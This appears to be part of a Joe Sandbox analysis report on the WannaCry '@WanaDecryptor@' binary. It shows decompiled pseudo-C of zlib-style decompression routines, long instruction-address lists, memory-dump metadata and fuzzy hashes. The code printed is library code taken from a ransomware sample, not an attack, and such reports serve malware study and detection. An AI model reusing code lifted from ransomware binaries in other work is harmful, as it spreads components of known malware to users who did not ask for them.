											__eax =  *(__esp + 0x20);
											if(__eax == __ecx) {
												__eax =  *(__esp + 0x14);
											} else {
												__edx = __ecx;
												if(__edx >= __eax) {
													__eax =  *(__esp + 0x18);
													__eax =  *(__esp + 0x18) - __edx;
												} else {
													__eax = __eax - __edx;
													__eax = __eax - 1;
												}
											}
										}
										if(__eax == 0) {
											L91:
											__eax =  *(__esp + 0x28);
											__ecx =  *(__esp + 0x2c);
											 *(__esi + 0x20) =  *(__esp + 0x28);
											 *(__esi + 0x1c) = __ebx;
											__ebx =  *__edi;
											__eax = __ebp;
											__edi[1] =  *(__esp + 0x2c);
											__ecx = __edi[2];
											__eax = __ebp -  *__edi;
											 *__edi = __ebp;
											__ecx = __edi[2] + __ebp -  *__edi;
											__edi[2] = __edi[2] + __ebp -  *__edi;
											__ecx =  *(__esp + 0x30);
											_push( *(__esp + 0x30));
											_push(__edi);
											_push(__esi);
											 *(__esi + 0x34) = __edx;
											__eax = E0040DDA0();
											__esp = __esp + 0xc;
											return __eax;
										} else {
											goto L83;
										}
									} else {
										__eax =  *(__esi + 0x30);
										__ecx =  *(__esi + 0x28);
										if(__eax == __ecx) {
											goto L73;
										} else {
											__edx = __ecx;
											if(__edx >= __eax) {
												__eax =  *(__esp + 0x18);
												__eax =  *(__esp + 0x18) - __edx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											if(__eax != 0) {
												goto L83;
											} else {
												goto L73;
											}
										}
									}
								}
								goto L99;
							case 7:
								if(__ebx > 7) {
									__ecx =  *(__esp + 0x2c);
									__ebx = __ebx - 8;
									__ecx =  *(__esp + 0x2c) + 1;
									__ebp = __ebp - 1;
									 *(__esp + 0x2c) =  *(__esp + 0x2c) + 1;
								}
								 *(__esi + 0x34) = __edx;
								__edx =  *(__esp + 0x30);
								_push( *(__esp + 0x30));
								_push(__edi);
								_push(__esi);
								__eax = E0040DDA0();
								__edx =  *(__esi + 0x34);
								__ecx =  *(__esi + 0x30);
								__esp = __esp + 0xc;
								if( *(__esi + 0x30) == __edx) {
									__eax =  *(__esp + 0x10);
									 *( *(__esp + 0x10)) = 8;
									goto L97;
								} else {
									__ecx =  *(__esp + 0x28);
									 *(__esi + 0x1c) = __ebx;
									 *(__esi + 0x20) =  *(__esp + 0x28);
									__ecx =  *(__esp + 0x2c);
									__ebx =  *__edi;
									__edi[1] =  *(__esp + 0x2c);
									__ecx = __ebp;
									_push(__eax);
									__ecx = __ebp -  *__edi;
									__edi[2] = __edi[2] + __ebp -  *__edi;
									_push(__edi);
									__edi[2] = __edi[2] + __ebp -  *__edi;
									 *__edi = __ebp;
									_push(__esi);
									 *(__esi + 0x34) = __edx;
									__eax = E0040DDA0();
									__esp = __esp + 0xc;
									return __eax;
								}
								goto L99;
							case 8:
								L97:
								__ecx =  *(__esp + 0x28);
								__eax =  *(__esp + 0x2c);
								 *(__esi + 0x20) =  *(__esp + 0x28);
								 *(__esi + 0x1c) = __ebx;
								__ebx =  *__edi;
								__ecx = __ebp;
								__edi[1] =  *(__esp + 0x2c);
								__eax = __edi[2];
								__ecx = __ebp -  *__edi;
								_push(1);
								__eax = __edi[2] + __ebp -  *__edi;
								_push(__edi);
								__edi[2] = __edi[2] + __ebp -  *__edi;
								 *__edi = __ebp;
								_push(__esi);
								 *(__esi + 0x34) = __edx;
								__eax = E0040DDA0();
								__esp = __esp + 0xc;
								return __eax;
								goto L99;
							case 9:
								__eax =  *(__esp + 0x28);
								__ecx =  *(__esp + 0x2c);
								 *(__esi + 0x20) =  *(__esp + 0x28);
								 *(__esi + 0x1c) = __ebx;
								__ebx =  *__edi;
								__eax = __ebp;
								__edi[1] =  *(__esp + 0x2c);
								__ecx = __edi[2];
								__eax = __ebp -  *__edi;
								_push(0xfffffffd);
								__ecx = __edi[2] + __ebp -  *__edi;
								_push(__edi);
								__edi[2] = __edi[2] + __ebp -  *__edi;
								 *__edi = __ebp;
								_push(__esi);
								 *(__esi + 0x34) = __edx;
								__eax = E0040DDA0();
								__esp = __esp + 0xc;
								return __eax;
								goto L99;
						}
						L85:
						_t362 =  *( *(_t412 + 0x10));
					} while (_t362 <= 9);
					goto L86;
				}
				L99:
			}













                                  0x0040df36
                                  0x0040df3b
                                  0x0040df42
                                  0x0040df48
                                  0x0040df4a
                                  0x0040df4d
                                  0x0040df51
                                  0x0040df54
                                  0x0040df58
                                  0x0040df5b
                                  0x0040df61
                                  0x0040df6b
                                  0x0040df63
                                  0x0040df65
                                  0x0040df65
                                  0x0040df6d
                                  0x0040df6f
                                  0x0040df76
                                  0x0040e4e7
                                  0x0040e4ef
                                  0x0040e4f2
                                  0x0040e4f9
                                  0x0040e501
                                  0x0040e505
                                  0x0040e506
                                  0x0040e509
                                  0x0040e50b
                                  0x0040e50c
                                  0x0040e51e
                                  0x0040df7c
                                  0x0040df7c
                                  0x0040df7c
                                  0x00000000
                                  0x0040df88
                                  0x0040e02c
                                  0x0040e02c
                                  0x0040e035
                                  0x0040e03b
                                  0x0040e041
                                  0x00000000
                                  0x0040df99
                                  0x0040dfa1
                                  0x0040dfa4
                                  0x0040dfab
                                  0x0040dfb3
                                  0x0040dfb7
                                  0x0040dfbb
                                  0x0040dfbe
                                  0x0040dfc7
                                  0x0040dfc8
                                  0x0040dfc9
                                  0x0040dfca
                                  0x0040dfd5
                                  0x0040dfd6
                                  0x0040dfd7
                                  0x0040dfe2
                                  0x0040dfe4
                                  0x0040dfe7
                                  0x0040dfeb
                                  0x0040dfee
                                  0x0040dff2
                                  0x0040dff5
                                  0x0040dffa
                                  0x0040dffe
                                  0x0040e008
                                  0x0040e000
                                  0x0040e002
                                  0x0040e002
                                  0x0040e00c
                                  0x0040e010
                                  0x00000000
                                  0x0040e012
                                  0x0040e019
                                  0x0040e021
                                  0x0040e023
                                  0x00000000
                                  0x0040e023
                                  0x0040e010
                                  0x00000000
                                  0x00000000
                                  0x0040e044
                                  0x0040e048
                                  0x0040e04d
                                  0x0040e051
                                  0x0040e08d
                                  0x0040e0a1
                                  0x0040e0a6
                                  0x0040e0b3
                                  0x0040e0b7
                                  0x0040e0bd
                                  0x0040e0c1
                                  0x0040e0c5
                                  0x0040e0c9
                                  0x0040e0e6
                                  0x0040e10d
                                  0x00000000
                                  0x0040e113
                                  0x0040e115
                                  0x0040e119
                                  0x0040e51f
                                  0x0040e525
                                  0x00000000
                                  0x0040e11f
                                  0x0040e11f
                                  0x0040e125
                                  0x00000000
                                  0x0040e125
                                  0x0040e119
                                  0x0040e0e8
                                  0x0040e0e8
                                  0x0040e0ef
                                  0x0040e0f9
                                  0x0040e0ff
                                  0x0040e102
                                  0x00000000
                                  0x0040e102
                                  0x0040e0cb
                                  0x0040e0cb
                                  0x0040e0d2
                                  0x0040e0d5
                                  0x0040e0db
                                  0x00000000
                                  0x0040e0db
                                  0x0040e053
                                  0x0040e053
                                  0x0040e053
                                  0x0040e059
                                  0x00000000
                                  0x00000000
                                  0x0040e065
                                  0x0040e06d
                                  0x0040e073
                                  0x0040e076
                                  0x0040e080
                                  0x0040e084
                                  0x0040e087
                                  0x0040e08b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e08b
                                  0x00000000
                                  0x0040e053
                                  0x00000000
                                  0x00000000
                                  0x0040e12e
                                  0x0040e132
                                  0x0040e137
                                  0x0040e13b
                                  0x0040e175
                                  0x0040e175
                                  0x0040e17c
                                  0x0040e180
                                  0x0040e182
                                  0x0040e186
                                  0x0040e189
                                  0x0040e191
                                  0x0040e193
                                  0x0040e197
                                  0x0040e199
                                  0x0040e19b
                                  0x0040e19f
                                  0x0040e1a1
                                  0x0040e1a4
                                  0x0040e1aa
                                  0x0040e1ad
                                  0x0040e1b0
                                  0x00000000
                                  0x0040e13d
                                  0x0040e13d
                                  0x0040e13d
                                  0x0040e143
                                  0x00000000
                                  0x00000000
                                  0x0040e149
                                  0x0040e14a
                                  0x0040e14c
                                  0x0040e150
                                  0x0040e152
                                  0x0040e155
                                  0x0040e158
                                  0x0040e15a
                                  0x0040e15e
                                  0x0040e166
                                  0x0040e168
                                  0x0040e16c
                                  0x0040e16f
                                  0x0040e173
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e173
                                  0x00000000
                                  0x0040e13d
                                  0x00000000
                                  0x00000000
                                  0x0040e1b5
                                  0x0040e1b9
                                  0x0040e1b9
                                  0x0040e1be
                                  0x0040e1c2
                                  0x0040e1fc
                                  0x0040e1fc
                                  0x0040e203
                                  0x0040e207
                                  0x0040e20d
                                  0x0040e210
                                  0x0040e213
                                  0x0040e215
                                  0x0040e219
                                  0x0040e220
                                  0x0040e222
                                  0x0040e226
                                  0x0040e22a
                                  0x0040e22c
                                  0x0040e230
                                  0x0040e232
                                  0x0040e234
                                  0x0040e238
                                  0x0040e25f
                                  0x0040e569
                                  0x0040e56d
                                  0x0040e573
                                  0x0040e57a
                                  0x0040e582
                                  0x0040e585
                                  0x0040e58c
                                  0x0040e594
                                  0x0040e598
                                  0x0040e599
                                  0x0040e59c
                                  0x0040e59e
                                  0x0040e59f
                                  0x0040e5b1
                                  0x0040e265
                                  0x0040e265
                                  0x0040e269
                                  0x0040e27a
                                  0x0040e27d
                                  0x00000000
                                  0x0040e27d
                                  0x0040e23a
                                  0x0040e23a
                                  0x0040e23e
                                  0x0040e241
                                  0x0040e248
                                  0x0040e24b
                                  0x0040e251
                                  0x0040e254
                                  0x00000000
                                  0x0040e254
                                  0x0040e1c4
                                  0x0040e1c4
                                  0x0040e1c4
                                  0x0040e1ca
                                  0x00000000
                                  0x00000000
                                  0x0040e1d0
                                  0x0040e1d1
                                  0x0040e1d3
                                  0x0040e1d7
                                  0x0040e1d9
                                  0x0040e1dc
                                  0x0040e1df
                                  0x0040e1e1
                                  0x0040e1e5
                                  0x0040e1ed
                                  0x0040e1ef
                                  0x0040e1f3
                                  0x0040e1f6
                                  0x0040e1fa
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e1fa
                                  0x00000000
                                  0x0040e1c4
                                  0x00000000
                                  0x00000000
                                  0x0040e286
                                  0x0040e28a
                                  0x0040e28f
                                  0x0040e293
                                  0x0040e2cf
                                  0x0040e2cf
                                  0x0040e2d6
                                  0x0040e2da
                                  0x0040e2dc
                                  0x0040e2e0
                                  0x0040e2e3
                                  0x0040e2eb
                                  0x0040e2ed
                                  0x0040e2f1
                                  0x0040e2f3
                                  0x0040e2f5
                                  0x0040e2f9
                                  0x00000000
                                  0x0040e295
                                  0x0040e295
                                  0x0040e295
                                  0x0040e29b
                                  0x00000000
                                  0x00000000
                                  0x0040e2a1
                                  0x0040e2a3
                                  0x0040e2a4
                                  0x0040e2a7
                                  0x0040e2ab
                                  0x0040e2ad
                                  0x0040e2af
                                  0x0040e2b1
                                  0x0040e2b5
                                  0x0040e2b8
                                  0x0040e2c0
                                  0x0040e2c2
                                  0x0040e2c6
                                  0x0040e2c9
                                  0x0040e2cd
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e2cd
                                  0x0040e52e
                                  0x0040e532
                                  0x0040e535
                                  0x0040e541
                                  0x0040e54a
                                  0x0040e54c
                                  0x0040e54f
                                  0x0040e556
                                  0x0040e557
                                  0x0040e558
                                  0x0040e568
                                  0x0040e568
                                  0x00000000
                                  0x00000000
                                  0x0040e2ff
                                  0x0040e2ff
                                  0x0040e303
                                  0x0040e305
                                  0x0040e308
                                  0x0040e30d
                                  0x0040e311
                                  0x0040e313
                                  0x0040e316
                                  0x0040e318
                                  0x0040e31c
                                  0x0040e326
                                  0x0040e326
                                  0x0040e328
                                  0x0040e32d
                                  0x00000000
                                  0x00000000
                                  0x0040e322
                                  0x0040e322
                                  0x0040e32f
                                  0x0040e32f
                                  0x0040e333
                                  0x0040e337
                                  0x0040e33c
                                  0x0040e340
                                  0x0040e346
                                  0x0040e348
                                  0x00000000
                                  0x0040e34e
                                  0x0040e34e
                                  0x0040e353
                                  0x0040e357
                                  0x0040e378
                                  0x0040e378
                                  0x0040e37b
                                  0x0040e37f
                                  0x0040e380
                                  0x0040e381
                                  0x0040e382
                                  0x0040e387
                                  0x0040e38a
                                  0x0040e38e
                                  0x0040e391
                                  0x0040e396
                                  0x0040e39a
                                  0x0040e3a1
                                  0x0040e3a4
                                  0x0040e39c
                                  0x0040e39c
                                  0x0040e39e
                                  0x0040e39e
                                  0x0040e3a6
                                  0x0040e3a9
                                  0x0040e3af
                                  0x0040e3b3
                                  0x0040e3b5
                                  0x0040e3b8
                                  0x0040e3be
                                  0x0040e3d3
                                  0x0040e3c0
                                  0x0040e3c0
                                  0x0040e3c4
                                  0x0040e3cb
                                  0x0040e3cf
                                  0x0040e3c6
                                  0x0040e3c6
                                  0x0040e3c8
                                  0x0040e3c8
                                  0x0040e3c4
                                  0x0040e3be
                                  0x0040e3d9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e359
                                  0x0040e359
                                  0x0040e35c
                                  0x0040e361
                                  0x00000000
                                  0x0040e363
                                  0x0040e363
                                  0x0040e367
                                  0x0040e36e
                                  0x0040e372
                                  0x0040e369
                                  0x0040e369
                                  0x0040e36b
                                  0x0040e36b
                                  0x0040e376
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e376
                                  0x0040e361
                                  0x0040e357
                                  0x00000000
                                  0x0040e3df
                                  0x0040e3df
                                  0x0040e3e3
                                  0x0040e3e4
                                  0x0040e3ec
                                  0x0040e3ee
                                  0x0040e3f1
                                  0x0040e3f5
                                  0x0040e3f6
                                  0x0040e3fa
                                  0x0040e3fe
                                  0x0040e402
                                  0x0040e404
                                  0x0040e407
                                  0x0040e407
                                  0x0040e40b
                                  0x0040e40f
                                  0x0040e40f
                                  0x0040e40f
                                  0x0040e418
                                  0x00000000
                                  0x00000000
                                  0x0040e41f
                                  0x0040e4b6
                                  0x0040e4b6
                                  0x0040e4ba
                                  0x0040e4bb
                                  0x0040e4bc
                                  0x0040e4c4
                                  0x0040e4c7
                                  0x0040e4cb
                                  0x0040e4ce
                                  0x0040e4d2
                                  0x0040e4d2
                                  0x00000000
                                  0x0040e425
                                  0x0040e425
                                  0x0040e42a
                                  0x0040e42e
                                  0x0040e44f
                                  0x0040e44f
                                  0x0040e452
                                  0x0040e456
                                  0x0040e457
                                  0x0040e458
                                  0x0040e459
                                  0x0040e45e
                                  0x0040e461
                                  0x0040e465
                                  0x0040e468
                                  0x0040e46d
                                  0x0040e471
                                  0x0040e478
                                  0x0040e47b
                                  0x0040e473
                                  0x0040e473
                                  0x0040e475
                                  0x0040e475
                                  0x0040e47d
                                  0x0040e480
                                  0x0040e486
                                  0x0040e48a
                                  0x0040e48c
                                  0x0040e48f
                                  0x0040e495
                                  0x0040e4aa
                                  0x0040e497
                                  0x0040e497
                                  0x0040e49b
                                  0x0040e4a2
                                  0x0040e4a6
                                  0x0040e49d
                                  0x0040e49d
                                  0x0040e49f
                                  0x0040e49f
                                  0x0040e49b
                                  0x0040e495
                                  0x0040e4b0
                                  0x0040e5b2
                                  0x0040e5b2
                                  0x0040e5b6
                                  0x0040e5ba
                                  0x0040e5bd
                                  0x0040e5c0
                                  0x0040e5c2
                                  0x0040e5c4
                                  0x0040e5c7
                                  0x0040e5ca
                                  0x0040e5cc
                                  0x0040e5ce
                                  0x0040e5d0
                                  0x0040e5d3
                                  0x0040e5d7
                                  0x0040e5d8
                                  0x0040e5d9
                                  0x0040e5da
                                  0x0040e5dd
                                  0x0040e5e2
                                  0x0040e5ec
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e430
                                  0x0040e430
                                  0x0040e433
                                  0x0040e438
                                  0x00000000
                                  0x0040e43a
                                  0x0040e43a
                                  0x0040e43e
                                  0x0040e445
                                  0x0040e449
                                  0x0040e440
                                  0x0040e440
                                  0x0040e442
                                  0x0040e442
                                  0x0040e44d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040e44d
                                  0x0040e438
                                  0x0040e42e
                                  0x00000000
                                  0x00000000
                                  0x0040e5f0
                                  0x0040e5f2
                                  0x0040e5f6
                                  0x0040e5f9
                                  0x0040e5fa
                                  0x0040e5fb
                                  0x0040e5fb
                                  0x0040e5ff
                                  0x0040e602
                                  0x0040e606
                                  0x0040e607
                                  0x0040e608
                                  0x0040e609
                                  0x0040e60e
                                  0x0040e611
                                  0x0040e614
                                  0x0040e619
                                  0x0040e652
                                  0x0040e656
                                  0x00000000
                                  0x0040e61b
                                  0x0040e61b
                                  0x0040e61f
                                  0x0040e622
                                  0x0040e625
                                  0x0040e629
                                  0x0040e62b
                                  0x0040e62e
                                  0x0040e630
                                  0x0040e631
                                  0x0040e636
                                  0x0040e638
                                  0x0040e639
                                  0x0040e63c
                                  0x0040e63e
                                  0x0040e63f
                                  0x0040e642
                                  0x0040e647
                                  0x0040e651
                                  0x0040e651
                                  0x00000000
                                  0x00000000
                                  0x0040e65c
                                  0x0040e65c
                                  0x0040e660
                                  0x0040e664
                                  0x0040e667
                                  0x0040e66a
                                  0x0040e66c
                                  0x0040e66e
                                  0x0040e671
                                  0x0040e674
                                  0x0040e676
                                  0x0040e678
                                  0x0040e67a
                                  0x0040e67b
                                  0x0040e67e
                                  0x0040e680
                                  0x0040e681
                                  0x0040e684
                                  0x0040e689
                                  0x0040e693
                                  0x00000000
                                  0x00000000
                                  0x0040e694
                                  0x0040e698
                                  0x0040e69c
                                  0x0040e69f
                                  0x0040e6a2
                                  0x0040e6a4
                                  0x0040e6a6
                                  0x0040e6a9
                                  0x0040e6ac
                                  0x0040e6ae
                                  0x0040e6b0
                                  0x0040e6b2
                                  0x0040e6b3
                                  0x0040e6b6
                                  0x0040e6b8
                                  0x0040e6b9
                                  0x0040e6bc
                                  0x0040e6c1
                                  0x0040e6cb
                                  0x00000000
                                  0x00000000
                                  0x0040e4d8
                                  0x0040e4dc
                                  0x0040e4de
                                  0x00000000
                                  0x0040df7c
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b8eabf12bd29c3c38fc8e7bc8212d9d6bf0432072041c2816a53c5bd799d9a5
                                  • Instruction ID: e5ae74944e208cb03c60f72bb217c75502e03934b58f7a9b199ce6c2a9593854
                                  • Opcode Fuzzy Hash: 9b8eabf12bd29c3c38fc8e7bc8212d9d6bf0432072041c2816a53c5bd799d9a5
                                  • Instruction Fuzzy Hash: 5E2239B46083018FC308CF29D590A2ABBE1FF88354F148A6EE49AD7751D734E955CF5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410460 Relevance: .4, Instructions: 377COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 98%
                                  			E00410460(intOrPtr* _a4, signed int _a8) {
				signed int* _t124;
				signed int _t172;
				signed int _t176;
				signed int _t225;
				intOrPtr* _t229;
				signed int _t230;

				_t229 = _a4;
				if(_t229 == 0) {
					L36:
					return 0xfffffffe;
				} else {
					_t124 =  *(_t229 + 0x1c);
					if(_t124 != 0 &&  *_t229 != 0) {
						_t176 =  *_t124;
						_t225 = 0xfffffffb;
						_t172 = (0 | _a8 != 0x00000004) - 0x00000001 & 0xfffffffb;
						_a8 = _t172;
						if(_t176 <= 0xd) {
							_t230 = 5;
							do {
								switch( *((intOrPtr*)(_t176 * 4 +  &M00410860))) {
									case 0:
										_t177 =  *((intOrPtr*)(_t229 + 4));
										if(_t177 == 0) {
											goto L39;
										} else {
											 *((intOrPtr*)(_t229 + 4)) = _t177 - 1;
											_t225 = _t172;
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											_t124[1] = 0;
											_t126 =  *(_t229 + 0x1c);
											 *_t229 =  *_t229 + 1;
											if((_t126[1] & 0x0000000f) == 8) {
												if((_t126[1] >> 4) + 8 <= _t126[4]) {
													 *_t126 = 1;
													goto L12;
												} else {
													 *_t126 = 0xd;
													 *(_t229 + 0x18) = "invalid window size";
													goto L34;
												}
											} else {
												 *_t126 = 0xd;
												 *(_t229 + 0x18) = "unknown compression method";
												goto L34;
											}
										}
										goto L54;
									case 1:
										L12:
										_t127 =  *((intOrPtr*)(_t229 + 4));
										if(_t127 == 0) {
											goto L39;
										} else {
											 *((intOrPtr*)(_t229 + 4)) = _t127 - 1;
											_t225 = _t172;
											_t173 =  *(_t229 + 0x1c);
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											_t131 =  *_t229;
											_t188 =  *_t131;
											 *_t229 = _t131 + 1;
											if((_t173[1] << 8) % 0x1f == 0) {
												if((_t188 & 0x00000020) != 0) {
													_t174 = _a8;
													 *( *(_t229 + 0x1c)) = 2;
													goto L38;
												} else {
													 *_t173 = 7;
													_t172 = _a8;
													_t230 = 5;
													goto L35;
												}
											} else {
												 *_t173 = 0xd;
												_t172 = _a8;
												_t230 = 5;
												 *(_t229 + 0x18) = "incorrect header check";
												( *(_t229 + 0x1c))[1] = 5;
												goto L35;
											}
										}
										goto L54;
									case 2:
										L38:
										_t138 =  *((intOrPtr*)(_t229 + 4));
										if(_t138 != 0) {
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											 *((intOrPtr*)(_t229 + 4)) = _t138 - 1;
											_t226 = _t174;
											( *(_t229 + 0x1c))[2] = 0 << 0x18;
											 *_t229 =  *_t229 + 1;
											 *( *(_t229 + 0x1c)) = 3;
											goto L41;
										} else {
											goto L39;
										}
										goto L54;
									case 3:
										L41:
										_t143 =  *((intOrPtr*)(_t229 + 4));
										if(_t143 != 0) {
											 *((intOrPtr*)(_t229 + 4)) = _t143 - 1;
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											_t227 = _t174;
											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2] + (0 << 0x10);
											 *_t229 =  *_t229 + 1;
											 *( *(_t229 + 0x1c)) = 4;
											goto L44;
										} else {
											return _t226;
										}
										goto L54;
									case 4:
										L44:
										_t150 =  *((intOrPtr*)(_t229 + 4));
										if(_t150 != 0) {
											 *((intOrPtr*)(_t229 + 4)) = _t150 - 1;
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											_t228 = _t174;
											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2] + (0 << 8);
											 *_t229 =  *_t229 + 1;
											 *( *(_t229 + 0x1c)) = 5;
											goto L47;
										} else {
											return _t227;
										}
										goto L54;
									case 5:
										L47:
										_t158 =  *((intOrPtr*)(_t229 + 4));
										if(_t158 != 0) {
											 *((intOrPtr*)(_t229 + 4)) = _t158 - 1;
											 *((intOrPtr*)(_t229 + 8)) =  *((intOrPtr*)(_t229 + 8)) + 1;
											( *(_t229 + 0x1c))[2] = ( *(_t229 + 0x1c))[2];
											 *_t229 =  *_t229 + 1;
											_t163 =  *(_t229 + 0x1c);
											 *(_t229 + 0x30) = _t163[2];
											 *_t163 = 6;
											return 2;
										} else {
											return _t228;
										}
										goto L54;
									case 6:
										 *(__esi[7]) = 0xd;
										__eax = __esi[7];
										__esi[6] = "need dictionary";
										 *((intOrPtr*)(__esi[7] + 4)) = 0;
										__eax = 0xfffffffe;
										return 0xfffffffe;
										goto L54;
									case 7:
										_push(__edi);
										_push(__esi);
										_push( *((intOrPtr*)(__eax + 0x14)));
										__edi = E0040E840();
										__esp = __esp + 0xc;
										if(__edi != 0xfffffffd) {
											if(__edi == 0) {
												__edi = __ebx;
											}
											if(__edi != 1) {
												goto L39;
											} else {
												__eax = __esi[7];
												__edi = __ebx;
												__eax = E0040E720( *((intOrPtr*)(__esi[7] + 0x14)), __esi, __esi[7] + 4);
												__eax = __esi[7];
												if( *((intOrPtr*)(__eax + 0xc)) == 0) {
													 *__eax = 8;
													goto L25;
												} else {
													 *__eax = 0xc;
													goto L35;
												}
											}
										} else {
											 *(__esi[7]) = 0xd;
											__eax = __esi[7];
											 *((intOrPtr*)(__eax + 4)) = 0;
											goto L35;
										}
										goto L54;
									case 8:
										L25:
										__eax = __esi[1];
										if(__eax == 0) {
											goto L39;
										} else {
											__esi[1] = __eax;
											__esi[2] = __esi[2] + 1;
											__esi[2] = __esi[2] + 1;
											__eax =  *__esi;
											__edi = __ebx;
											 *(__esi[7] + 8) = 0 << 0x18;
											 *__esi =  *__esi + 1;
											 *__esi =  *__esi + 1;
											__eax = __esi[7];
											 *(__esi[7]) = 9;
											goto L27;
										}
										goto L54;
									case 9:
										L27:
										__eax = __esi[1];
										if(__eax == 0) {
											goto L39;
										} else {
											__eax = __eax - 1;
											__esi[2] = __esi[2] + 1;
											__esi[1] = __eax;
											__eax = __esi[7];
											__edi = __ebx;
											 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 0x10);
											 *__esi =  *__esi + 1;
											 *__esi =  *__esi + 1;
											__eax = __esi[7];
											 *(__esi[7]) = 0xa;
											goto L29;
										}
										goto L54;
									case 0xa:
										L29:
										__eax = __esi[1];
										if(__eax == 0) {
											goto L39;
										} else {
											__eax = __eax - 1;
											__esi[2] = __esi[2] + 1;
											__esi[1] = __eax;
											__eax = __esi[7];
											__edi = __ebx;
											 *(__esi[7] + 8) =  *(__esi[7] + 8) + (0 << 8);
											 *__esi =  *__esi + 1;
											 *__esi =  *__esi + 1;
											__eax = __esi[7];
											 *(__esi[7]) = 0xb;
											goto L31;
										}
										goto L54;
									case 0xb:
										L31:
										__eax = __esi[1];
										if(__eax == 0) {
											L39:
											return _t225;
										} else {
											__esi[1] = __eax;
											__eax = __esi[7];
											__esi[2] = __esi[2] + 1;
											__edi = __ebx;
											 *(__esi[7] + 8) =  *(__esi[7] + 8);
											 *__esi =  *__esi + 1;
											 *__esi =  *__esi + 1;
											__eax = __esi[7];
											if( *((intOrPtr*)(__eax + 4)) ==  *((intOrPtr*)(__eax + 8))) {
												 *(__esi[7]) = 0xc;
												goto L52;
											} else {
												 *__eax = 0xd;
												__esi[6] = "incorrect data check";
												L34:
												( *(_t229 + 0x1c))[1] = _t230;
												goto L35;
											}
										}
										goto L54;
									case 0xc:
										L52:
										__eax = 1;
										return 1;
										goto L54;
									case 0xd:
										__eax = 0xfffffffd;
										return 0xfffffffd;
										goto L54;
								}
								L35:
								_t124 =  *(_t229 + 0x1c);
								_t176 =  *_t124;
							} while (_t176 <= 0xd);
						}
					}
					goto L36;
				}
				L54:
			}









                                  0x00410463
                                  0x0041046a
                                  0x0041070e
                                  0x00410714
                                  0x00410470
                                  0x00410470
                                  0x00410475
                                  0x0041048d
                                  0x00410493
                                  0x00410498
                                  0x0041049e
                                  0x004104a2
                                  0x004104a8
                                  0x004104ad
                                  0x004104ad
                                  0x00000000
                                  0x004104b4
                                  0x004104b9
                                  0x00000000
                                  0x004104bf
                                  0x004104c2
                                  0x004104c9
                                  0x004104cb
                                  0x004104d2
                                  0x004104d5
                                  0x004104e4
                                  0x004104e6
                                  0x00410508
                                  0x0041051c
                                  0x00000000
                                  0x0041050a
                                  0x0041050a
                                  0x00410510
                                  0x00000000
                                  0x00410510
                                  0x004104e8
                                  0x004104e8
                                  0x004104ee
                                  0x00000000
                                  0x004104ee
                                  0x004104e6
                                  0x00000000
                                  0x00000000
                                  0x00410522
                                  0x00410522
                                  0x00410527
                                  0x00000000
                                  0x0041052d
                                  0x00410530
                                  0x00410537
                                  0x00410539
                                  0x0041053c
                                  0x0041053f
                                  0x00410548
                                  0x0041054b
                                  0x00410559
                                  0x0041057f
                                  0x00410718
                                  0x00410721
                                  0x00000000
                                  0x00410585
                                  0x00410585
                                  0x0041058b
                                  0x0041058f
                                  0x00000000
                                  0x0041058f
                                  0x0041055b
                                  0x0041055b
                                  0x00410564
                                  0x00410568
                                  0x0041056d
                                  0x00410574
                                  0x00000000
                                  0x00410574
                                  0x00410559
                                  0x00000000
                                  0x00000000
                                  0x00410727
                                  0x00410727
                                  0x0041072c
                                  0x0041073c
                                  0x00410741
                                  0x00410749
                                  0x0041074e
                                  0x00410757
                                  0x00410759
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041075f
                                  0x0041075f
                                  0x00410764
                                  0x00410770
                                  0x00410779
                                  0x00410781
                                  0x0041078b
                                  0x00410794
                                  0x00410796
                                  0x00000000
                                  0x00410766
                                  0x0041076c
                                  0x0041076c
                                  0x00000000
                                  0x00000000
                                  0x0041079c
                                  0x0041079c
                                  0x004107a1
                                  0x004107ad
                                  0x004107b6
                                  0x004107be
                                  0x004107c8
                                  0x004107ce
                                  0x004107d3
                                  0x00000000
                                  0x004107a3
                                  0x004107a9
                                  0x004107a9
                                  0x00000000
                                  0x00000000
                                  0x004107d5
